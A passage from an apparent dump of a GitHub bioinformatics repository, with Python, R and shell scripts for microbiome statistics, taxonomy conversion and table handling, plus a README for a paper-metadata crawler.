doi_info = soup.find(class_ = \"identifier doi\") \n http = doi_info.find(class_ = \"id-link\")['href'] # 增加这一步是因为偶尔会出现 NCBI 的链接\n\n # 一作和通讯\n authors = soup.find(class_ = \"authors-list\").get_text().strip().replace(u'\\xa0', '').replace(u'\\xa0', '').replace(' ', '')\n author_list = re.sub('\\n\\w*', '', authors).split(',')\n first_author = author_list[0]\n corresponding_author = author_list[-1]\n\n # 第一单位\n affiliations = soup.find(class_ = \"affiliations\").get_text().strip()\n affiliations = re.sub('[ ]+', ' ', affiliations)\n affiliations_list = re.sub('[\\n]{2,}', '', affiliations).split('\\n')\n first_affiliation = affiliations_list[1].lstrip(' 0123456789')\n\n line = '\\t'.join([title, journal_name, p_time.replace('.', ''), PMID, DOI, http, IF, first_author, corresponding_author, first_affiliation])\n print(line, file = out)\n print(line)\n \nout.close()\n"
},
{
"alpha_fraction": 0.6732348203659058,
"alphanum_fraction": 0.6929392218589783,
"avg_line_length": 45.846153259277344,
"blob_id": "5f50371995f5642377cd0c6ec3b11255ef3944f1",
"content_id": "795c96864a3d57775c6ee185a767431ad4a8a1a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 13,
"path": "/rat/beta/merge.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n#合并组间或组内的距离文件\nACK = pd.read_table('ACK-ACK.distance.txt', header=0, index_col=0)\nEL = pd.read_table('EL-EL.distance.txt', header=0, index_col=0)\nCig = pd.read_table('Cig-Cig.distance.txt', header=0, index_col=0)\nmerge = pd.concat([ACK,EL,Cig])\nmerge.to_csv('intra_group.txt', sep='\\t')\n\nACK_Cig = pd.read_table('ACK-Cig.distance.txt', header=0, index_col=0)\nACK_EL = pd.read_table('ACK-EL.distance.txt', header=0, index_col=0)\nEL_Cig = pd.read_table('EL-Cig.distance.txt', header=0, index_col=0)\ntwo_merge = pd.concat([ACK_Cig,ACK_EL,EL_Cig])\ntwo_merge.to_csv('inter_group.txt', sep='\\t')\n"
},
{
"alpha_fraction": 0.4752475321292877,
"alphanum_fraction": 0.5,
"avg_line_length": 31.31999969482422,
"blob_id": "b078726132a3f55c61bc2d374e7a27f3af716148",
"content_id": "b9ffc349d62bccdd207018e3a4ce7969d1c2bdde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 912,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 25,
"path": "/mac_md5.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 发现 mac 下没有找到合适的 md5 校验工具,所以写了个脚本,用于和 linux 下 md5sum 产生的文件 md5 值进行校验,较简略\nimport re,os\nos.system('md5 *gz > temp.md5')\n# transform 转化格式\nwith open('temp.md5','r') as IN, open('new.md5', 'w') as out:\n for line in IN:\n match = re.search('MD5 \\((.*)\\) = (\\w+)',line)\n if match:\n print(match.group(2) + ' ' + match.group(1), file=out)\n\n#比较前后文件的 md5\nDcit = dict()\nwith open('md5.txt','r') as IN:\n for line in IN:\n lst = line.strip('\\n').split(' ')\n Dcit[lst[0]] = lst[1]\nwith open('new.md5','r') as IN:\n for line in IN:\n lst = line.strip('\\n').split(' ')\n if lst[0] in Dcit:\n if Dcit[lst[0]] == lst[1]:\n continue\n # print(lst[1] + ' is ok\\n')\n else:\n print(lst[0] + ' is not ok!')\n"
},
{
"alpha_fraction": 0.6509919166564941,
"alphanum_fraction": 0.6767082810401917,
"avg_line_length": 55.70833206176758,
"blob_id": "53d41d1aa198a95677a74b261e13b6eb6d251329",
"content_id": "256873ae63f4163fa1f41f76f94cc1022b5bc32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 334,
"num_lines": 24,
"path": "/plotIdGenerate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 统计丰度表中,所有大于 1(1%)的物种的 ID, 画柱状图时, 需要把在所有样品中小于 1% 的物种合并为 others, 想了半天才想起来这个脚本的功能,必须得做好日志文件呀.\n# 通用性不高,记在此处只是当做记录脚本.\n#! /usr/bin/python3\nimport argparse,re\nparser = argparse.ArgumentParser(description = \"based on the abundance file,get the species ID for with abundance > 1% in any of sample, for the x axis text of barplot of before and after two groups...not very clear.\")\nparser.add_argument('-i','--Input', help = \"the input file\")\nparser.add_argument('-o','--Output', help = \"the output directory\")\nargs=parser.parse_args()\n(Input,Output) = (args.Input,args.Output)\nif not Input or not Output:\n print(\"Plase add the parameters,thank you :)\\n\\nExample: python3 plotIdGenerate.py -i /ifshk5/BC_COM_P11/F17HTSCCWLJ1810/RATdkdM/MetaPhlAn2/process/Taxonomy_MetaPhlAn2/MetaPhlAn2_Analysis/All/GoALL/phylumProfileTable.xls -o /ifshk5/BC_COM_P11/F17HTSCCWLJ1810/RATdkdM/MetaPhlAn2/process/Taxonomy_MetaPhlAn2/MetaPhlAn2_Analysis\\n\")\n exit()\nmatch = re.match('(.*)ProfileTable',Input.split(\"/\")[-1])\noutfile = Output + '/' + match.group(1) + 'ID'\nwith open(Input,'r') as IN,open(outfile,'w') as out:\n IN.readline()\n for line in IN:\n lst = line.strip('\\n').split('\\t')\n for index in range(1,len(lst)):\n if float(lst[index]) > 1:\n out.write(lst[0]+\"\\n\")\n break\n else:\n next\n"
},
{
"alpha_fraction": 0.8243243098258972,
"alphanum_fraction": 0.837837815284729,
"avg_line_length": 73,
"blob_id": "16cc81d4a49b79f60ac9330926c1c4dad3c9b70c",
"content_id": "17c4d72aed52922357476e4b140253b1ded3e40f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 1,
"path": "/rat/beta/beta.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "python3 beta.py beta_diversity[dir] speciesProfileTable.xls species[plot]\n"
},
{
"alpha_fraction": 0.654974102973938,
"alphanum_fraction": 0.6664749979972839,
"avg_line_length": 33.07843017578125,
"blob_id": "cdadd79b7f43a5591f6c39354a9041f90c972794",
"content_id": "7af20a85578bba0d37212de147f3af7a4344d672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1739,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 51,
"path": "/Kraken2/kraken_trans.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,os,shutil,re,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nConvert the kark file of kraken2 to some new for krona sofaware.\nExample: python3 kraken_trans.py -i krakfile -o outdir\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Indir', help = \"the directory of krakfile by kraken2.\")\nparser.add_argument('-o','--outdir',help = \"the output directory, full path.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\n(krakdir,outdir) = (args.Indir, args.outdir)\npar = [krakdir,outdir]\n\nif not all(par):\n\tparser.print_help()\n\texit()\n\nif os.path.exists(outdir):\n\tshutil.rmtree(outdir)\n\nos.makedirs(outdir)\nTaxid2Tax = dict()\nwith open('/ifswh1/BC_PS/wangpeng7/database/taxdump/taxonomy2sevenlevel.txt','r') as IN:\n\tfor line in IN:\n\t\tline = line.strip('\\n').split('\\t')\n\t\tTaxid2Tax[line[0]] = line[1]\n\nfor krakfile in glob.glob(krakdir + '/*krak'):\n\tbasename = os.path.basename(krakfile)\n\tmatch = re.search('(.*).krak', basename)\n\tprefix = match.group(1)\n\toutfile = outdir + '/' + prefix + '.trans.krak'\n\twith open(krakfile,'r') as IN, open(outfile,'w') as out:\n\t\tfor line in IN:\n\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\tseqId = lst[1]\n\t\t\ttax = lst[2]\n\t\t\ttax_match = re.search('taxid (\\d+)', tax)\n\t\t\ttaxId = tax_match.group(1)\n\t\t\tif taxId == '0':\n\t\t\t\tprint (seqId + '\\t' + 'Unclassified;Unclassified;Unclassified;Unclassified;Unclassified;Unclassified;Unclassified', file=out)\n\t\t\telif taxId in Taxid2Tax:\n\t\t\t\tprint(seqId + '\\t' + Taxid2Tax[taxId], file=out)\n\t#\t\telse:\n\t#\t\t\tprint(taxId + ' is not found! please check~')\n\n"
},
{
"alpha_fraction": 0.6360538601875305,
"alphanum_fraction": 0.6485477685928345,
"avg_line_length": 46.76744079589844,
"blob_id": "a4b983fba029dc142505c88f97254699d8388c7d",
"content_id": "0869eb607f35ba0aa0ab26acf2fe72727d973a47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 6393,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 129,
"path": "/anova.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript\n# 计算个体间 SE 函数\nsummarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE,\n conf.interval=.95, .drop=TRUE) {\n library(plyr)\n\n # New version of length which can handle NA's: if na.rm==T, don't count them\n length2 <- function (x, na.rm=FALSE) {\n if (na.rm) sum(!is.na(x))\n else length(x)\n }\n\n # This does the summary. For each group's data frame, return a vector with\n # N, mean, and sd\n datac <- ddply(data, groupvars, .drop=.drop,\n .fun = function(xx, col) {\n c(N = length2(xx[[col]], na.rm=na.rm),\n mean = mean (xx[[col]], na.rm=na.rm),\n sd = sd (xx[[col]], na.rm=na.rm)\n )\n },\n measurevar\n )\n\n # Rename the \"mean\" column \n datac <- rename(datac, c(\"mean\" = measurevar))\n\n datac$se <- datac$sd / sqrt(datac$N) # Calculate standard error of the mean\n\n # Confidence interval multiplier for standard error\n # Calculate t-statistic for confidence interval: \n # e.g., if conf.interval is .95, use .975 (above/below), and use df=N-1\n ciMult <- qt(conf.interval/2 + .5, datac$N-1)\n datac$ci <- datac$se * ciMult\n\n return(datac)\n}\n\n\n\nlibrary(ggplot2)\nlibrary(dplyr)\nlibrary(ggpubr)\nlibrary(car)\nArgs <- commandArgs(TRUE) \ntable = Args[1] # 阿尔法多样性和丰富度文件与分组信息合并以后的 FexposeDiversity.txt\nfilename_prefix = Args[2] # 分组文件 Sample_information_detail.txt Fexpose\n#group_list = Args[3] # Healthy:CASE\n\ndt = read.table(table, header=T)\ndt$Group = ordered(dt$Group, levels=c('CK','E-liquid','Cigarette')) # 标记\ntheme_set(theme_bw())\n# gene number \ndt_summary = summarySE(dt, measurevar=\"number\", groupvars=\"Group\")\n\nnumber_pc =ggplot(dt_summary, aes(x=Group, y=number, fill=Group)) + \n geom_bar(position=position_dodge(), stat=\"identity\") + \n geom_errorbar(aes(ymin=number-se, ymax=number+se),\n width=.2, # Width of the error bars\n position=position_dodge(10)) + # 实现条形距离的调整\n scale_fill_manual(values = c(\"#c8d1a2\", \"#87d1e0\", \"#dfb0ce\")) +\n labs(x=\"\", y = \"Gene Number\") + ggtitle(paste(filename_prefix, \"gene number barpplot\", sep=\" \")) + \n theme(plot.title = element_text(hjust = 0.5),\n axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7),\n axis.title = element_text(size = 10),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.2,0.2, 0.2, 0.2), 'in')) # 上,右,下,左\n\nres.aov = aov(number ~ Group, data = dt)\nanova_number = summary(res.aov)\nanova_number = data.frame(unclass(anova_number), check.names = FALSE, stringsAsFactors = FALSE)\nTukey_number = TukeyHSD(res.aov)\nTukey_number = data.frame(unclass(Tukey_number), check.names = FALSE, stringsAsFactors = FALSE)\n\n#plot(res.aov, 1) # 方差齐性的图\nhomogeneity_number = leveneTest(number ~ Group, data = dt) # 方差齐性检验\nhomogeneity_number = data.frame(unclass(homogeneity_number), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 2) # 正态分布的图\naov_residuals = residuals(object = res.aov) # Extract the residuals\nnormality_number = shapiro.test(x = aov_residuals) # 正态分布检验\nnormality_number = data.frame(unclass(normality_number), check.names = FALSE, stringsAsFactors = FALSE)\n\n# shannon index \ndt_summary = summarySE(dt, measurevar=\"shannon\", groupvars=\"Group\")\nshannon_pc = ggplot(dt_summary, aes(x=Group, y=shannon, fill=Group)) + \n geom_bar(position=position_dodge(), stat=\"identity\") + \n geom_errorbar(aes(ymin=shannon-se, ymax=shannon+se),\n width=.2, # Width of the error bars\n position=position_dodge(10)) + # 实现条形距离的调整\n scale_fill_manual(values = c(\"#c8d1a2\", \"#87d1e0\", \"#dfb0ce\")) +\n labs(x=\"\", y = \"shannon index\") + ggtitle(paste(filename_prefix, \"gene shannon barpplot\", sep=\" \")) + \n theme(plot.title = element_text(hjust = 0.5),\n axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7),\n axis.title = element_text(size = 10),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.2,0.2, 0.2, 0.2), 'in')) # 上,右,下,左\n \nres.aov = aov(shannon ~ Group, data = dt)\nanova_shannon = data.frame(unclass(summary(res.aov)), check.names = FALSE, stringsAsFactors = FALSE)\nTukey_shannon = TukeyHSD(res.aov)\nTukey_shannon = data.frame(unclass(TukeyHSD(res.aov)), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 1) # 方差齐性的图\nhomogeneity_shannon = leveneTest(shannon ~ Group, data = dt) # 方差齐性检验\nhomogeneity = data.frame(unclass(homogeneity_shannon), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 2) # 正态分布的图\naov_residuals = residuals(object = res.aov) # Extract the residuals\nnormality_shannon = shapiro.test(x = aov_residuals) # 正态分布检验\nnormality_shannon = data.frame(unclass(normality_shannon), check.names = FALSE, stringsAsFactors = FALSE)\n\n# output\npdf(paste(filename_prefix,\"_number_barplot.pdf\",sep=\"\"),width=6,height=4)\nnumber_pc\ndev.off()\n\npdf(paste(filename_prefix,\"_shannon_barplot.pdf\",sep=\"\"),width=6,height=4)\nshannon_pc\ndev.off()\n\nwrite.table(anova_number,file = paste(filename_prefix,\"_anova_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(Tukey_number,file = paste(filename_prefix,\"_Tukey_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(homogeneity_number,file = paste(filename_prefix,\"_homogeneity_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(normality_number,file = paste(filename_prefix,\"_normality_number.txt\", sep=\"\"),sep = \"\\t\",quote = F)\n\nwrite.table(anova_shannon,file = paste(filename_prefix,\"_anova_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(Tukey_shannon,file = paste(filename_prefix,\"_Tukey_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(homogeneity_shannon,file = paste(filename_prefix,\"_homogeneity_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\nwrite.table(normality_shannon,file = paste(filename_prefix,\"_normality_shannon.txt\", sep=\"\"),sep = \"\\t\",quote = F)\n\n"
},
{
"alpha_fraction": 0.6998792290687561,
"alphanum_fraction": 0.7077294588088989,
"avg_line_length": 45,
"blob_id": "bb96d9e11593307472f482bc3178366b209b96b3",
"content_id": "5555d230960722e9816f6ed3b230f0aad358ad89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1686,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 36,
"path": "/Maaslin/tsvGeneration.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript #写得挺烂的。。。有时间改改。。\nArgs <- commandArgs(TRUE)\nabundance_table = Args[1] # should begin with \"SampleID\", to be continued\ngroup_table = Args[2] # group informational should be 'Group', should begin with \"#SampleID\"\nindice = Args[3] # Age:BMI:SUA\ngroup = Args[4] #T0:Control\nprefix = Args[5] #\noutdir = Args[6]\nindice_list = unlist(strsplit(indice,\":\"))\ngroup_list = unlist(strsplit(group,\":\"))\nfilename_prefix= gsub(\":\", \"_\", indice)\nfilename = paste(paste(prefix,filename_prefix, sep=\"_\"),\"tsv\", sep=\".\")\noutfile = paste(outdir,filename,sep=\"/\")\ninfo = read.table(group_table,header = T,sep = \"\\t\",comment.char = \"\", check.names =F)\n#index = info$SamplingTime %in% group_list #gout\nindex = info$Group %in% group_list\ninfoSub = info[index,] #select lines contain \"T0\" and \"Control\"\nindices = c(\"#SampleID\",indice_list)\ninfoSub_indice = subset(infoSub,select = indices)# select data according to colnames\ncolnames(infoSub_indice)[1] = \"SampleID\"\n## delete lines contain \"NA\"\ndelSample = as.character(infoSub_indice[!complete.cases(infoSub_indice),]$SampleID) # need delete sampleID\nneedInfo = infoSub_indice[!infoSub_indice$SampleID %in% delSample,]\n\nprofile = read.table(abundance_table,header = T,sep = \"\\t\")\nprofile_t = t(profile)\ncolnames(profile_t) = profile_t[1,]\nprofile_t = profile_t[-1,]\nprofileDel = profile_t[rownames(profile_t) %in% needInfo[,1],]\nmode(profileDel) <- \"numeric\"\nprofileNorm = profileDel\nrownames(needInfo) = needInfo$SampleID\nmerge.tsv = merge(needInfo,profileNorm, by = 'row.names', all = T)\n#print(merge.tsv)\nmerge.tsv = merge.tsv[,-1]\nwrite.table(merge.tsv,file = outfile ,sep = \"\\t\",quote = F,row.names = F)\n"
},
{
"alpha_fraction": 0.617393434047699,
"alphanum_fraction": 0.6299580931663513,
"avg_line_length": 42.180850982666016,
"blob_id": "40013e2735c099dc1bb39784a6cbf2c4e5b6ee76",
"content_id": "9add9a5e2c8d9951f609e20456d2e6a764501523",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 4209,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 94,
"path": "/rat/beta/anova.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript\n# 计算个体间 SE 函数\nsummarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE,\n conf.interval=.95, .drop=TRUE) {\n library(plyr)\n\n # New version of length which can handle NA's: if na.rm==T, don't count them\n length2 <- function (x, na.rm=FALSE) {\n if (na.rm) sum(!is.na(x))\n else length(x)\n }\n\n # This does the summary. For each group's data frame, return a vector with\n # N, mean, and sd\n datac <- ddply(data, groupvars, .drop=.drop,\n .fun = function(xx, col) {\n c(N = length2(xx[[col]], na.rm=na.rm),\n mean = mean (xx[[col]], na.rm=na.rm),\n sd = sd (xx[[col]], na.rm=na.rm)\n )\n },\n measurevar\n )\n\n # Rename the \"mean\" column\n datac <- rename(datac, c(\"mean\" = measurevar))\n\n datac$se <- datac$sd / sqrt(datac$N) # Calculate standard error of the mean\n\n # Confidence interval multiplier for standard error\n # Calculate t-statistic for confidence interval:\n # e.g., if conf.interval is .95, use .975 (above/below), and use df=N-1\n ciMult <- qt(conf.interval/2 + .5, datac$N-1)\n datac$ci <- datac$se * ciMult\n\n return(datac)\n}\nlibrary(ggplot2)\nlibrary(\"carData\", lib.loc=\"R_lib\")\nlibrary(\"car\", lib.loc=\"R_lib\")\nArgs <- commandArgs(TRUE)\nfilename = Args[1] # 阿尔法多样性和丰富度文件与分组信息合并以后的 FexposeDiversity.txt\nfilename_prefix = Args[2] # Fexpose\nplot_title = Args[3] # genus\norder = Args[4] # ACK:EL:Cig\nitem = Args[5] # distance\ngroup = Args[6] # group\n\nlevel_order = unlist(strsplit(order,\":\"))\ndt = read.table(filename, header=T)\ndt$group = ordered(dt$group, levels=level_order) # 标记\ntheme_set(theme_bw())\n\n#SE\ndt_summary = summarySE(dt, measurevar=item, groupvars=group)\n\npc =ggplot(dt_summary, aes_string(x=group, y=item, fill=group)) +\n geom_bar(position=position_dodge(), stat=\"identity\") +\n geom_errorbar(aes(ymin=dt_summary[[item]]-se, ymax=dt_summary[[item]]+se), # 太机智了 8..\n width=.2, # Width of the error bars\n position=position_dodge(10)) + # 实现条形距离的调整\n scale_fill_manual(values = c(\"#c8d1a2\", \"#87d1e0\", \"#dfb0ce\")) +\n labs(x=\"\", y = item) + ggtitle(paste(filename_prefix, plot_title, item,\"barpplot\", sep=\" \")) +\n theme(plot.title = element_text(hjust = 0.5),\n axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7),\n axis.title = element_text(size = 10),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.2,0.2, 0.2, 0.2), 'in')) # 上,右,下,左\n\nrun = paste(\"res.aov = aov(\",item,\" ~ \",group,\",data=dt)\", sep=\"\")\neval(parse(text = run))\nanova = summary(res.aov)\nanova = data.frame(unclass(anova), check.names = FALSE, stringsAsFactors = FALSE)\nTukey = TukeyHSD(res.aov)\nTukey = data.frame(unclass(Tukey), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 1) # 方差齐性的图\nrun = paste(\"homogeneity = leveneTest(\",item,\" ~ \",group,\",data=dt)\", sep=\"\")\neval(parse(text = run))\n#homogeneity = leveneTest(item ~ group, data = dt) # 方差齐性检验\nhomogeneity = data.frame(unclass(homogeneity), check.names = FALSE, stringsAsFactors = FALSE)\n#plot(res.aov, 2) # 正态分布的图\naov_residuals = residuals(object = res.aov) # Extract the residuals\nnormality = shapiro.test(x = aov_residuals) # 正态分布检验\nnormality = data.frame(unclass(normality), check.names = FALSE, stringsAsFactors = FALSE)\n\n# output\npdf(paste(filename_prefix,\"_\",item,\"_barplot.pdf\",sep=\"\"),width=6,height=4)\npc\ndev.off()\nwrite.table(anova,file = paste(filename_prefix,\"_anova_\",item,\".txt\", sep=\"\"),sep = \"\\t\",quote = F,col.names=NA)\nwrite.table(Tukey,file = paste(filename_prefix,\"_Tukey_\",item,\".txt\", sep=\"\"),sep = \"\\t\",quote = F,col.names=NA)\nwrite.table(homogeneity,file = paste(filename_prefix,\"_homogeneity_\",item,\".txt\", sep=\"\"),sep = \"\\t\",quote = F,col.names=NA)\nwrite.table(normality,file = paste(filename_prefix,\"_normality_\",item,\".txt\", sep=\"\"),sep = \"\\t\",quote = F,col.names=NA)\n"
},
{
"alpha_fraction": 0.7617554664611816,
"alphanum_fraction": 0.7633228898048401,
"avg_line_length": 50.040000915527344,
"blob_id": "47f340358cd08d304d087aede0406366cbc25a19",
"content_id": "ed2eeb2cd249b748a90e22e79fe895e92acd1699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1748,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 25,
"path": "/Paper_information/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "## Paper_information.sh \nBased on doi, you can use this script to crawl information about paper such as title, journal name, IF... and download the pdf. \n\nThe scihub.py were edited based on [scihub.py/scihub.py at master · zaytoun/scihub.py · GitHub](https://github.com/zaytoun/scihub.py/blob/master/scihub/scihub.py)\n\nBefore use, you need to install some packages or sofeware, including phantomjs, Selenium, BS4 for advanced_paper_informational.py (based on selenium) and requests, retrying, pysocks for scihub.py (based on requests). \n\nYou should also add these to your envirment variable (export or edit the .bashrc file)\n\n## Paper_information.sh (中文版说明)\n只需要输入 DOI,就可以得到文献题目,杂志名称,发表时间,PMID,文献DOI,文献原文网址,一作(第一个位置),通讯(最后一个位置),第一单位等信息,以及下载文献功能。 \n\nscihub.py 是在这个链接上基础稍微改动一点儿得到的: [scihub.py/scihub.py at master · zaytoun/scihub.py · GitHub](https://github.com/zaytoun/scihub.py/blob/master/scihub/scihub.py)。\n\n使用之前,你可能需要安装一些软件或者包,比如 phantomjs, Selenium, BS4 (advanced_paper_informational.py,基于 selenium 爬取) 和 requests, retrying, pysocks (scihub.py,基于 requests 爬取)。 \n然后记得添加至环境变量。\n\n## 大道理 \n\"Everything should be made as simple as possible, but no simpler.\" \n『一切应该尽可能简单,但不能过于简单。』\n\n## 写在最后 \n后续想考虑怎么进行可视化.. \n因为是很粗糙的第一版,可能会有不少问题,如果遇到了,可以尝试联系我:[email protected] \n祝大家使用愉快~ 如果有人用的话.. :)\n"
},
{
"alpha_fraction": 0.6156657934188843,
"alphanum_fraction": 0.6234986782073975,
"avg_line_length": 35.132076263427734,
"blob_id": "6efe962f5de798183b8abd09ed7c90b903e83ade",
"content_id": "770037c4bb88ec973fa006265df8416d153e3339",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2295,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 53,
"path": "/Phenotype/cat_diff.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# /user/bin/Rscript \n# 对离散型变量进行差异检验,理论频数小于 5 用 fisher , 否则用卡方检验; 输出两种文件,一种是表型每种分类的的个数以及百分比,另外一种是差异检验的结果,暂且不用多重校正。\nlibrary(dplyr)\nlibrary(data.table)\ndt = read.table('../Samle_Information_categorical.xls', sep = '\\t', header = T)\ngroup = 'NS:FS:CS' #the colname of group is 'Group'\ngroup_list = unlist(strsplit(group, \":\"))\nindice_index = 3 #表型开始的列的位置,从 1 开始\n\nfileConn<-file(\"diff_results.xls\",'w')\nhead = paste('Characteristic', 'P value', 'Method', sep ='\\t')\nwriteLines(head, fileConn)\n\n# 计算连续变量的 sd 和 mean ... 但是我目前不需要这个...\n#temp = dt[c('Group', 'Age')]\n#ag = aggregate(. ~ Group, temp, function(x) c(mean = round(mean(x),2), sd = round(sd(x),2)))\n#ag_flat <- do.call(\"data.frame\", ag) # flatten\n\nfor (index in indice_index:ncol(dt)){\n indice = colnames(dt)[index]\n\tsub_dt = dt[c('Group',indice)] # 提取\n\t sub_dt = sub_dt[!(is.na(sub_dt[indice])),] 剔除表型的 Na 值,否则会对差异检验造成影响;\n\tfreq = sub_dt %>%\n group_by(Group, eval(parse(text = indice))) %>% # 将变量转化为内置变量(大概这么叫吧)\n summarise(n = n()) %>% # 天呐这个功能太好用了...\n mutate(freq = round(n / sum(n)*100,2)) %>% #另一个常见的操作是添加新的列。这就是mutate()函数的工作了。\n mutate(item = paste(n,'(', freq, ')', sep = ''))\n\tcolnames(freq)[2] = indice\n\n#freq\n\tneed = freq[c('Group',indice,'item')]\n#need\n\tdt_cast = dcast(need, eval(parse(text = indice))~Group, value.var='item', fill=0) #太牛批了\n\tcolnames(dt_cast)[1] = indice\n\tdt_cast = dt_cast[c(indice,group_list)]\n#dt_cast\n\twrite.table(dt_cast, file = paste(indice, \"information.xls\", sep = \"_\"),sep=\"\\t\",quote = F, row.names = F)\n\n#计算 P 值\n\tctable = table(sub_dt)\n\n\tif (any(ctable < 5)){\n \tp = fisher.test(ctable, simulate.p.value = TRUE, B = 1e6)$p.value\n\t line = paste(indice, p, 'fisher', sep ='\\t')\n\t writeLines(line, fileConn)\n\t} else {\n \tp = chisq.test(ctable)$p.value\n \tline = paste(indice, p,'chisq', sep ='\\t')\n\t\tprint(indice)\n \twriteLines(line, fileConn)\n }\n}\nclose(fileConn)\n"
},
{
"alpha_fraction": 0.7838827967643738,
"alphanum_fraction": 0.791208803653717,
"avg_line_length": 67.25,
"blob_id": "8631333b858dd5a89f7fb85f590756b5b7167ad1",
"content_id": "00ab3a21447171d07258fb8705e9321a79abecdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 4,
"path": "/Maaslin/maaslin.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /bin/bash\nRscript tsvGeneration.R diff_NCA_AMI_speciesProfileTable.xls phenotype.update.xls Group:Gender:Age NCA:AMI NCA_AMI ./\npython3 config_generate.py NCA_AMI_Group_Gender_Age.tsv 4\nRscript maaslin_run.R -i NCA_AMI_Group_Gender_Age.tsv -c generated_config -o outdir\n"
},
{
"alpha_fraction": 0.6902030110359192,
"alphanum_fraction": 0.6946160793304443,
"avg_line_length": 52.9523811340332,
"blob_id": "a10236d63386a94083635bcf32d2ff6fe3844d4e",
"content_id": "5601bcacfc0a936d3f03ff41440663235a3f1881",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1287,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 21,
"path": "/SplitbyRownames.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import pandas as pd\ndt = pd.read_table('braycurtis.txt', index_col=0)\nexpose_diversity = dt.loc[dt.index.str.contains('-a') == False, dt.columns.str.contains('-a') == False] #这个用法比较巧妙,行名不包含'-a'的行;\nrecovery_diversity = dt.loc[dt.index.str.contains('-a'), dt.columns.str.contains('-a')] # 行名包含 '-a' 的行;\nexpose_diversity.to_csv('expose_diversity', sep='\\t')\nrecovery_diversity.to_csv('recovery_diversity', sep='\\t')\n\n#补充用法,增加单独筛选行或者列的用法,一旦不用就老是忘记....\ndt = pd.read_table('genusProfileTable.xls', header = 0, index_col = 0, sep=\"\\t\")\nexpose_dt = dt.loc[:,dt.columns.str.contains('-a') == False]\nrecovery_dt = dt.loc[:,dt.columns.str.contains('-a')] #注意冒号的使用,代表全部!\nexpose_dt.to_csv('expose_genusProfileTable.xls', sep='\\t')\nrecovery_dt.to_csv('recovery_genusProfileTable.xls', sep='\\t')\n\n#增加通过正则表达式的筛选\nimport pandas as pd\ndt = pd.read_table('expose_genusProfileTable.xls', header=0, 